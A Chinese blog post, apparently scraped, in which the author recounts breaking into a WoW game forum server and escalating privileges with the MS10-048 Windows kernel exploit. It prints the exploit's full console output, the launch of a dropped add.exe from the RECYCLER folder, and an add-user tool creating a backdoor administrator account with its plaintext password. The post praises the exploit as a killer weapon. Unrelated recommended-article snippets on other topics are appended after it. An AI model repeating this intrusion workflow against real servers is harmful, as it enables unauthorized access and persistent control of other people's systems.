今天搞了个wow的游戏论坛,服务器环境是win03 x86+iis6.0+php+mysql。

提权的时候各种无奈,mysql无权限,而且没root,试了几个别的方法都不行,实在没办法的时候,用MS10048试了下,成功了。

Dojibiron by Ronald Huizer, (c) master#h4cker.us  

[ ] Trying to allocate a page at NULL.

    [+] Allocated page at 0x0000000000000000 for 0x0000000000000001

[ ] Bootstrapping kernel resolver.

    Module ntoskrnl.exe at 0x0000000000BD0000

    Base of driver: 0xFFFFF80001000000

    [+] Success.

[ ] Resolving PsReferencePrimaryToken

    [+] Success: 0xFFFFF8000129FE50

[ ] Resolving PsInitialSystemProcess

    [+] Success: 0xFFFFF800011D1FB0

[ ] Resolving PsLookupProcessByProcessId

    [+] Success: 0xFFFFF80001288BC0

[ ] Resolving PsDereferencePrimaryToken

    [+] Success: 0xFFFFF80001311B40

[+] Handle table retrieval succeeded.

    Userspace handle table: 0x00000000006B0000

    Kernelspace handle table: 0xFFFFF97FF7990000

    Handle table entries: 1024

[ ] Allocating fake HEAD page.

    [+] Allocated page at 0x0000000004000000 for 0x00000000040001FF

[ ] Setting up CBT filter hook.

    [+] Success.

[ ] Creating evil window

    [+] Success.

[ ] Destroyed handle at: 0xFFFFF97FF7990FC0

    pHead:	0xFFFFF97FF906BA00

    pOwner:	0xFFFFFA80000E8D80

    bType:	0x01 - TYPE_WINDOW

    bFlags:	0x00 -

    wUniq:	0x0004

[ ] Trigger handle at: 0xFFFFF97FF7995AC0

    pHead:	0xFFFFF97FF90900A0

    pOwner:	0xFFFFFA80000E8D80

    bType:	0x01 - TYPE_WINDOW

    bFlags:	0x00 -

    wUniq:	0x0003

[ ] Writing pool addr to: 0xFFFFF97FF7990F7F

	~ MS10_048 X64 EXP        ~

	Need a girl to love   QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	aster#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	01010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	0101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	1001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	00000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	0101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	10101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	1001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	11111111110101010101111010101110101010101010101010101010111100000000000110

	110101010101010101010101010111100000000000110

	111100000000000110

	0000110

[ ] Checking the success flag.

    [+] Set to 2 exploit half succeeded

[ ] Destroying trigger window

    pHead:	0x00000000000003CA

    pOwner:	0x0000000000000000

    bType:	0x00 - TYPE_FREE

    bFlags:	0x00 -

    wUniq:	0x0004

[ ] Spawning half a shell...

    Command: D:\RECYCLER\add.exe

[+] Enjoy!

          ==========================================

              Api Add User Made By Cond0r

                    2011.3.20

              Adduser.exe UserName PassWord Group

          ==========================================

	 User List:

	-->  7ksf

	-->  ASPNET

	-->  Guestasdfa

	-->  IUSR_NJXW-12-5-2

	-->  IWAM_NJXW-12-5-2

	-->  SUPPORT_388945a0

	Group List:

	 --> Administrators

	 --> Backup Operators

	 --> Distributed COM Users

	 --> Guests

	 --> Network Configuration Operators

	 --> Performance Log Users

	 --> Performance Monitor Users

	 --> Power Users

	 --> Print Operators

	 --> Remote Desktop Users

	 --> Replicator

	 --> Users

	 --> HelpServicesGroup

	 --> IIS_WPG

	 --> TelnetClients 

 SuccessFul !!User "Cond0r" Pass "123!@#asdASD" Add User SuccessFul !!

利用api加用户工具,成功添加cond0r密码为123!@#asdASD的账户

MS10048依旧是Windows 2003 x86 的杀器的更多相关文章

  1. Windows 2003 FastCgi安装环境

    Windows 2003 IIS+PHP5.4.3 安装教程 一.准备相关组件 安装前,先安装IIS. 1.安装FastCgi for IIS6 Fastcgi官方网址是:http://www.iis ...

  2. Windows 2003上 SaltStack/Salt 和 psutil 可能存在的问题及解决

    今天把salt安装在windows 2003上,发现无法启动,随之而来的是一个有一个的坑,让我们一起逐个排查. 问题一(salt无法启动) salt无法启动,错误结果如图:

  3. Windows 2003】利用域&&组策略自动部署软件

    Windows 2003]利用域&&组策略自动部署软件 转自 http://hi.baidu.com/qu6zhi/item/4c0fa100dc768613cc34ead0 ==== ...

  4. 使用docker-compose 大杀器来部署服务 上

    使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...

  5. Windows 2003 Server 标准版启动问题解决(资源转贴)

    维护的系统之一是部署在windows2003 Server标准版的服务器上,可能是由于某个应用问题,导致远程重启失败,害得我在机房呆了一早晨,可算是够折腾的.最后按照官方文档解决,刚放文档地址是:ht ...

  6. 使用docker-compose 大杀器来部署服务 上(转)

    使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...

  7. 利用pentestbox打造ms17-010移动"杀器"

    本文首发Freebuf,属原创奖励计划,未经许可禁止转载. 链接:http://www.freebuf.com/articles/system/132274.html 一. 前言 前段时间Shadow ...

  8. [转]使用docker-compose 大杀器来部署服务 上

    本文转自:https://www.cnblogs.com/neptunemoon/p/6512121.html 使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker ...

  9. 使用docker-compose 大杀器来部署服务

    使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...

随机推荐

  1. DP:Wooden Sticks(POJ 1065)

    摆木棍 题目大意:即使有一堆木棍,给一个特殊机器加工,木棍都有两个属性,一个是l一个是w,当机器启动的时候(加工第一根木棒的时候),需要一分钟,在这以后,设机器加工的上一根木棒的长度是l,质量是w,下 ...

  2. 快速排序模板qsort(转载)

     qsort  用 法: void qsort(void *base, int nelem, int width, int (*fcmp)(const void *,const void *)); 各 ...

  3. HDU 5514 Frogs (容斥原理+因子分解)

    题目链接 题意:有n只青蛙,m个石头(围成圆圈).第i只青蛙每次只能条ai个石头,问最后所有青蛙跳过的石头的下标总和是多少? 题解:暴力肯定会超时,首先分解出m的因子,自己本身不用分,因为石头编号是0 ...

  4. UVA 10325 The Lottery( 容斥原理)

    The Sports Association of Bangladesh is in great problem with their latest lottery `Jodi laiga Jai'. ...

  5. SQL单表查询

    --1,选择不猛30中的雇员 SELECT * FROM EMP WHERE DEPTNO = 30; --2,列出所有办事员的姓名,编号和部门 SELECT ENAME,EMPNO,DEPTNO F ...

  6. Html标签<a>的target属性

    target属性规定了在何处打开超链接的文档. 如果在一个 <a> 标签内包含一个 target 属性,浏览器将会载入和显示用这个标签的 href 属性命名的.名称与这个目标吻合的框架或者 ...

  7. eclipse静态部署tomcat

  8. IDE整理

    1.eclipse 下载地址:http://www.eclipse.org/downloads/     2.myeclipse 下载地址:http://www.myeclipseide.com/mo ...

  9. MySQL主备库切换(MHA)演练与总结

      演练包括被动切换和主动切换两部分.被动切换是主库宕机,主动切换是人工手动触发.   演练步骤大致如下:       1 先停掉主库,模拟主库宕机     2 mha将vip切到备库,备库变成主库, ...

  10. Hadoop 1.1.2 eclipse plugin 编译 win7 集成

    Windows平台上使用ANT编译Hadoop Eclipse Plugin 一.准备工作:   1.安装JDK 下载页面:http://www.oracle.com/technetwork/java ...